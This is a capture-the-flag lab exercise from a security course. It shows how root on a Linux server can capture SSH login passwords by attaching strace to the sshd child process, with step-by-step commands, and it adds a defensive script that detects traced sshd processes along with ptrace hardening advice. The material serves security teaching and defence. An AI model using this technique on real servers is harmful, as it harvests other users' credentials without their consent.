H 131: Stealing an SSH Password with strace (10 pts)

What You Need for this Project

Purpose

To see how to steal passwords from an SSH server by attaching strace to the sshd process that handles a login.

I learned this technique from the Cyber June'Gle Virtual Training Summit --ty @texas_cyber @VillageRedTeam @randoriattack.

Adjusting the Google Cloud Firewall

On the left side of the Google Cloud Platform page, click the three-bar "hamburger" icon. Click "Compute Engine", "VM instances".

In the "VM instances" page, on your Debian instance's line, on the right side, click the three-dot icon and click "View network details".

On the left side, click Firewall.

At the top center, click "CREATE FIREWALL RULE".

Enter these values, as shown below.

At the bottom, click the CREATE button.

Creating a Test User

On your Linux server, in an SSH session, execute this command:
sudo adduser waldo
Give the user a password you can remember, and press Enter enough times to complete the process, as shown below.

Installing strace

On your Linux server, in an SSH session, execute these commands:
sudo apt update
sudo apt install strace -y

Launching a Second SSH Server

On your Linux server, in an SSH session, execute these commands:
cd
sudo cp /etc/ssh/sshd_config sshd_config
sudo chmod 777 sshd_config
nano sshd_config
Make sure these lines appear uncommented, as shown below. Note: this is risky; don't do it on a production server.

Press Ctrl+X, Y, Enter to save the file. On your Linux server, in an SSH session, execute these commands:

sudo /usr/sbin/sshd -f sshd_config -p 2222 &
sudo ss -ntlp
An sshd process is listening on port 2222, as shown below.

Logging In

From another system, such as a second Google Cloud Debian server, execute this command, replacing the IP address with the public address of your Linux server (the one now running the second sshd on port 2222):
ssh waldo@35.188.199.249 -p 2222
If you get a warning that the fingerprint is not recognized, enter yes, as shown below.

When it asks for a password, don't answer yet.

Finding the Correct Process

On your Linux server, in an SSH session, execute this command:
sudo ps aux | grep ssh
Find the process labelled waldo [priv], as shown below. Note the process ID in the second column in that row, outlined in the image below.

Execute this command, changing the process ID to the correct value:

sudo strace -p 23927 2> foo
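The attach above works because the kernel lets root ptrace any process; the sshd child shows that in its /proc/<pid>/status file as a non-zero TracerPid. As an added defensive counterpart (this script is not part of the original lab), here is a POSIX shell script that parses that field, scans the host for sshd processes with a tracer attached, and reports the Yama ptrace_scope setting. The sample status texts at the bottom are constructed for a stand-alone run; on a real host /proc separates fields with a tab, which the awk whitespace strip handles as well.

```shell
#!/bin/sh
# Added defensive example, not part of the original lab: detect whether any
# sshd process is being traced (as "strace -p" does above) and show the
# kernel's Yama ptrace_scope setting.

# Print the TracerPid value from the text of a /proc/<pid>/status file.
# A value of 0 means nobody is attached to the process.
tracer_pid_from_status() {
    printf '%s\n' "$1" | awk -F':' '/^TracerPid:/ { gsub(/[[:space:]]/, "", $2); print $2; exit }'
}

# Classify a status text: prints "traced" or "clean".
classify_status() {
    tp=$(tracer_pid_from_status "$1")
    tp=${tp:-0}
    if [ "$tp" -ne 0 ]; then echo traced; else echo clean; fi
}

# Walk /proc and report every sshd process that has a non-zero TracerPid.
# Returns 0 when nothing is traced, 1 when at least one sshd has a tracer.
scan_sshd_tracers() {
    found=0
    for status in /proc/[0-9]*/status; do
        [ -r "$status" ] || continue
        text=$(cat "$status" 2>/dev/null) || continue
        name=$(printf '%s\n' "$text" | awk -F':' '/^Name:/ { gsub(/[[:space:]]/, "", $2); print $2; exit }')
        [ "$name" = "sshd" ] || continue
        tp=$(tracer_pid_from_status "$text")
        tp=${tp:-0}
        if [ "$tp" -ne 0 ]; then
            pid=${status#/proc/}; pid=${pid%/status}
            tracer_cmd=$(tr '\0' ' ' < "/proc/$tp/cmdline" 2>/dev/null)
            echo "ALERT: sshd pid $pid is traced by pid $tp ($tracer_cmd)"
            found=1
        fi
    done
    return $found
}

# Report kernel.yama.ptrace_scope: 0 lets any same-uid process attach, 1 limits
# attach to descendants, 2 to CAP_SYS_PTRACE holders (root, as in this lab),
# and 3 disables ptrace attach entirely until reboot.
ptrace_scope() {
    cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo "unavailable"
}

# Constructed sample status texts (not captured from a real host).
SAMPLE_TRACED="Name: sshd
State: t (tracing stop)
TracerPid: 23900"
SAMPLE_CLEAN="Name: sshd
State: S (sleeping)
TracerPid: 0"

if [ "${1:-}" = "--scan" ]; then
    echo "yama ptrace_scope: $(ptrace_scope)"
    scan_sshd_tracers && echo "no traced sshd processes"
else
    echo "sample traced -> $(classify_status "$SAMPLE_TRACED")"
    echo "sample clean  -> $(classify_status "$SAMPLE_CLEAN")"
fi
```

Run it as `sudo sh detect_tracer.sh --scan` on the server while the strace from the step above is still attached and it reports the traced sshd child along with the tracer's command line; without `--scan` it only exercises the parser on the constructed samples. Because a point-in-time scan can miss a short attach, a host that should never be traced in production would additionally set `kernel.yama.ptrace_scope=3` and log the ptrace syscall with an audit rule such as `auditctl -a always,exit -F arch=b64 -S ptrace -k ptrace_attach`, so that the attach itself leaves a record.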

Entering the Password

On your second Linux server, enter Waldo's password to log in. Then enter this command to log out:
exit

Flag H 131.1: Stolen Password (10 pts)

On the SSH server, execute this command to see the stolen password, which appears in the fourth line of the strace output:
head foo
The flag is covered by a green rectangle in the image below.

References

Spying on ssh password using strace

Posted 6-27-2020